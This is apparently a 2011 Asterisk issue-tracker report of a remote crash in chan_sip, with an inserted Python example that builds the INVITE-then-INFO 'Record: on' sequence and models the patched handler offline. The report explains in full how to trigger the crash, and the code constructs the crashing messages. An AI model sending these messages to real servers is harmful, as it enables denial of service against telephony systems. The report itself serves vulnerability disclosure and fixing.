Summary: ASTERISK-18805: Remote crash vulnerability in chan_sip when automon in features.conf is enabled
Reporter: Kristijan Vrban (vrban)
Labels:
Date Opened: 2011-11-02 04:55:44
Date Closed: 2011-12-08 10:20:17.000-0600
Versions:
Frequency of
must be completed before resolving ASTERISK-18499 Asterisk Release Blockers
must be completed before resolving ASTERISK-18847 Asterisk 10.0.0 Release Blockers
Environment:
Attachments:
( 0) info_crash_fix.patch
( 1) info_crash.xml
Description: Asterisk 1.6/1.8/10 and trunk are affected. To crash Asterisk, you just need to send an aimless SIP INVITE (which gets a 407 answer)
just to open a SIP dialog, and then send a SIP INFO with a "Record: on" header in this dialog. Asterisk then crashes in channel.c/ast_queue_frame,
because ast_queue_frame(p->owner, &f) is called from handle_request_info with p->owner == NULL, since no channel is active.

The patch just checks if p->owner is set. Otherwise it sends a 481 (perhaps something else?)
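The two-message exchange described above, modelled offline as an added example (this is not code from the Asterisk project, from the attached patch, or from the attached SIPp scenario). The 407 response is a constructed sample standing in for what chan_sip returns to an INVITE without credentials; the addresses are RFC 5737 documentation addresses; the automon extension `*1`, the helper names, and the server-side `handle_request_info` model (Record: on queues one DTMF digit per character of the automon extension, anything else is answered 200 OK) are assumptions made for illustration, not chan_sip's actual code paths. Nothing is sent on the wire.

```python
"""ASTERISK-18805 exchange, modelled offline (added example, not project code)."""
import re

AUTOMON_EXTEN = "*1"  # assumed features.conf automon setting, not from the issue

# Constructed sample: what chan_sip answers to the unauthenticated INVITE.
# The To header now carries the server's tag, which the in-dialog INFO must reuse.
SAMPLE_407 = (
    "SIP/2.0 407 Proxy Authentication Required\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bKabc1;received=192.0.2.10\r\n"
    "From: <sip:attacker@192.0.2.10>;tag=ftag1\r\n"
    "To: <sip:100@198.51.100.5>;tag=as6f3a1c2e\r\n"
    "Call-ID: c4ll1d@192.0.2.10\r\n"
    "CSeq: 1 INVITE\r\n"
    'Proxy-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="1a2b3c4d"\r\n'
    "Content-Length: 0\r\n\r\n"
)


def parse_sip(msg):
    """Split a SIP message into (start line, headers, body); header names lower-cased."""
    head, _, body = msg.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def header(headers, name):
    """First value of a header, or None if absent."""
    return headers.get(name.lower(), [None])[0]


def tag_of(value):
    """The ;tag= parameter of a From/To header value, or None."""
    m = re.search(r";tag=([^;\s]+)", value or "")
    return m.group(1) if m else None


def build_invite(target, call_id, from_tag, branch):
    """The 'aimless' INVITE: no credentials, so chan_sip answers 407."""
    return (
        f"INVITE sip:100@{target} SIP/2.0\r\n"
        f"Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK{branch}\r\n"
        f"From: <sip:attacker@192.0.2.10>;tag={from_tag}\r\n"
        f"To: <sip:100@{target}>\r\n"
        f"Call-ID: {call_id}\r\n"
        "CSeq: 1 INVITE\r\n"
        "Max-Forwards: 70\r\n"
        "Content-Length: 0\r\n\r\n"
    )


def build_info(invite, resp_407, branch):
    """INFO addressed to the same dialog: same Call-ID and From tag, To tag from the 407."""
    inv_start, inv_h, _ = parse_sip(invite)
    status, resp_h, _ = parse_sip(resp_407)
    if not status.startswith("SIP/2.0 407"):
        raise ValueError("expected a 407 to the INVITE, got: " + status)
    if header(resp_h, "Call-ID") != header(inv_h, "Call-ID"):
        raise ValueError("407 does not belong to our INVITE")
    if tag_of(header(resp_h, "To")) is None:
        raise ValueError("407 carries no To tag; cannot address the dialog")
    cseq = int(header(inv_h, "CSeq").split()[0]) + 1
    request_uri = inv_start.split()[1]
    return (
        f"INFO {request_uri} SIP/2.0\r\n"
        f"Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK{branch}\r\n"
        f"From: {header(inv_h, 'From')}\r\n"
        f"To: {header(resp_h, 'To')}\r\n"
        f"Call-ID: {header(inv_h, 'Call-ID')}\r\n"
        f"CSeq: {cseq} INFO\r\n"
        "Max-Forwards: 70\r\n"
        "Record: on\r\n"
        "Content-Length: 0\r\n\r\n"
    )


def handle_request_info(owner, info_msg, automon_exten=AUTOMON_EXTEN):
    """Simplified model of the patched handler; returns the response status.

    'owner' is a list standing in for p->owner's frame queue, or None for
    p->owner == NULL (the INVITE was rejected, so no channel exists).
    """
    _, h, _ = parse_sip(info_msg)
    record = header(h, "Record")
    if record is None:
        return "200 OK"  # not the automon path; other INFO handling not modelled
    if owner is None:
        # The check the patch adds: before it, ast_queue_frame(NULL, &f) was reached.
        return "481 Call leg/transaction does not exist"
    if record.lower() == "on":
        owner.extend(automon_exten)  # one DTMF frame per digit of the automon exten
    return "200 OK"


def run_exchange():
    """Drive the exchange against the constructed 407 with no channel present."""
    invite = build_invite("198.51.100.5", "c4ll1d@192.0.2.10", "ftag1", "abc1")
    info = build_info(invite, SAMPLE_407, "abc2")
    return info, handle_request_info(None, info)
```

With `owner=None` the model answers 481, which is the behaviour the patch introduces; with a real owner queue it appends the automon digits, which is the path that only makes sense when a channel exists.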
Comments:
By: Kristijan Vrban (vrban) 2011-11-03 09:56:50.623-0500

Here is a SIPp scenario to reproduce the crash.